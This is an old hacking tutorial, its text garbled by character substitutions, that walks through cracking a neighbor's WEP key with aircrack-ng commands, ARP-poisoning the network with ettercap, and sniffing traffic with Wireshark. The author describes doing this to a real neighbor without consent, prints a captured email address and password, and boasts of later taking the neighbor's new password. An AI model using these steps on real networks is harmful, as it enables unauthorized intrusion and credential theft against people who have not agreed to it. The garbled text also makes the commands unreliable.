Hacking Wireless Networks

by data

The sole purpose of this article is so that you may be informed about how your neighbor may be able to take a laptop, crack your wep/wpa key to your router you think is safe, then reroute all your internet traffic to his computer you think he can't look at, and even watch you browse the internet in real time when you think nobody is watching

-disclaimer-

!n this article, ! don't plan on giving you any bullshit ! don't plan on hinting towards how to break into a wifi network, ! will show you how to break into a wifi network ! will do it simple steps, and only break them down if ! feel that you will need it or can benefit from knowing it The following sub$ects ! will touch on include the following% & 'rief !ntroduction to 'acktrack ( )racking the W*+ ,ey -we will go over W*+ cracking, ! may write another one on W+. a bit later / 0 1!T1 .ttack 2 'asic Network .nalysis

-What ! will be "oing #ver-

'acktrack is something that is essential, in my opinion, to be in any hackers toolbo3 !t is a live-linu3 cd that is compatible with most laptops -4ust for reference sake, ! am using my *ee +) with an e3ternal 5657om drive to boot it/ .ll you have to do is go to www remotee3ploit org and download the !8# that fits what you would like to use it on -)5, 565, or 98'/85/ #nce you do that, you will need to to stick the )5/565/98'/85 into your laptop, and restart When you restart, you must hit whatever key you need to do load the boot options, for most computers it's :; or :<, for mine, it's the *8) key #nce you boot into it, you will have to go through a few menus, basically all you have to do is keep hitting enter until the ,5* loads When the boot is finished, you should see a screen similar to this%

-'rief !ntroduction to 'acktrack-

-)racking the W*+ ,eyNote% :or reference, since not all parameters are the same for each laptop, ! have put them as variables -=/ where you plug in what is necessary for you

& #pen a new shell prompt%

1. Type airmon-ng to see what interfaces are available .s you can see ! have ( interfaces, wifi> and ath>, but wifi> is the parent of ath>, so this will be a bit tricky 1ost laptops only have one interface 2. Type airmon-ng stop ath0 to stop the ath> interface 3. Type airmon-ng start wifi0 so it puts ath> into monitor mode

4. Type clear to clear the screen then type ifconfig ath0 down 5. Now we need to change the 1.) address, to do this type macchanger mac 00:11:22:33:44:55 ath0

6. Now we need to turn our interfaces back on by typing airmon-ng start wifi0

7. Now we get down to the meat and bones, we can start scanning for networks by typing in airodump-ng ath0

; !f you already know the *88!5 of the network you would like to crack the W*+ key for, go right ahead and crack it, but because ! am doing this on a neighbor, ! took a guess that it was the one with the highest +W7 Which is linksys---- -blocked out for security purposes/

9. Now we are going to single that network out by typing in the following% airodump-ng -c $CHA !" -w wepcrac# $ssid $%&&'( ath0

11. Now our goal is to get the ?5ata field to reach around &>,>>> -$ust to be safe/ so we have to provoke the data by first associating ourselves with the network 5o this by typing airep)a*-ng -1 0 -a $%&&'( -h 00:11:22:33:44:55 -e $!&&'( ath0 i don't think ! would need to break this down for you, to do this, ! am sure you can $ust look at what ! did for each of the variables and plug in your own

12. Now that were associated, we can start sending packets back to the network, therfore increasing the amount in the ?5ata field We do this by typing in airep)a*-ng -3 -$ $%&&'( -h 00:11:22:33:44:55 ath0 13. #nce you think the ?5ata has climbbed to a decent amount, open a new shell prompt and type the following% aircrac#-ng -n +4 -$ $%&&'( wepcrac#-01,cap

)ongratulations@ We $ust cracked our first W*+ key Now what ! am going to do is restart my laptop and boot into my regular #8 and connect to the network now that ! have the W*+ key !n order to intercept their packets, we will need to find some way to take all their internet traffic, forward it to our laptop, then to the internet How do we do thisA Bup, a 1!T1 attack Here is a simple picture to demonstrate%

-1!T1 .ttack-

8o now you may be asking, how do I do this!? *ttercap is the answer, if your doing this on a Windows machine, your going to have to google it to install it, but if your on Cni3, you can download and install it simply by typing sudo apt-get insta)) ettercap #nce it is done, we can open the "9! for it by typing sudo ettercap -- into the shell

1. "o to &niff . /nified &niffing and then choose your interface, mine, of course, is ath> 2. :rom there go to Hosts . &ccan for Hosts

3. Now we need to see what hosts are up, do this by going to Hosts . Host "ist

4. Now, since it is common sense that usually the C C C & !+ is the router, we are going to highlight that, and click Add to 0arget 1, and since ! don't know what all the other !+'s go to, ! will highlight all the other !+'s and click Add to 0arget 2 5. "o to 1'01 . arp poisoning and press o#2 don't check any of the bo3es 6. Now go to &tart . &niffer D 1inimiEe ettercap

:inally, we can now start analyEing traffic from their network, this does take a lot of patience and luck though, because they have to be using the internet at the e3act time that you are connected to their network What ! did was simply left my laptop running for about an hour during the evening 1. 5ownload wireshark by typing sudo apt-get insta)) wireshar#2 if your on Windows, again, google it Bou can open it by simply typing sudo wireshar# into a shell

-'asic Network .nalysis-

2. "o to Capture . 'nterfaces and choose the interface you would like to use To choose it, click &tart that is ne3t to the interface, you can kind of get an idea of what interface to use because of the amount of packets going in and out of it

N#T*% 5# N#T )H##8* A 32 it won't work 0 Now we $ust have to sit back and wait till we get a bunch of packets, ! left mine running for about an hour and gathered about 0F,>>> packets .s you can imagine, that is a lot of packets to skim through on a laptop, and will take forever to search for one Guery, so ! have saved the pcap file -fi)e . sa4e/ and will analyEe it on my desktop machine, which has a bit more capacity to handle things like this Guicker 2 Now that we have all these packets, we can start looking for certain filters, to do this press C05"67 and click the %* &tring bubble F 8ince ! would like some passwords, type password into it, and see what we get H 8uccess@ .s you can see below, it found a packet that has the word password in it@

D Now we must right click the packet highlighted, and go to 7o))ow 0C8 &tream you will be prompted with something that looks like this%

; !'m sure you can't see this because the picture is a bit small, but if you Eoom in, you will be able to see Email_Textbox=dex-12%40yahoo.com and Password_Textbox=th4l1fe ! really do hope you've learned a decent amount from this article, if you have any Guestions at all, $ust email me at d2ta&0Igmail com 4ust a side note, the person ! did this on, a neighbor around the corner, has since deleted his myspace account, and made a new one, which ! then got the password to a couple of days later Thanks, -data

-)losing Notes-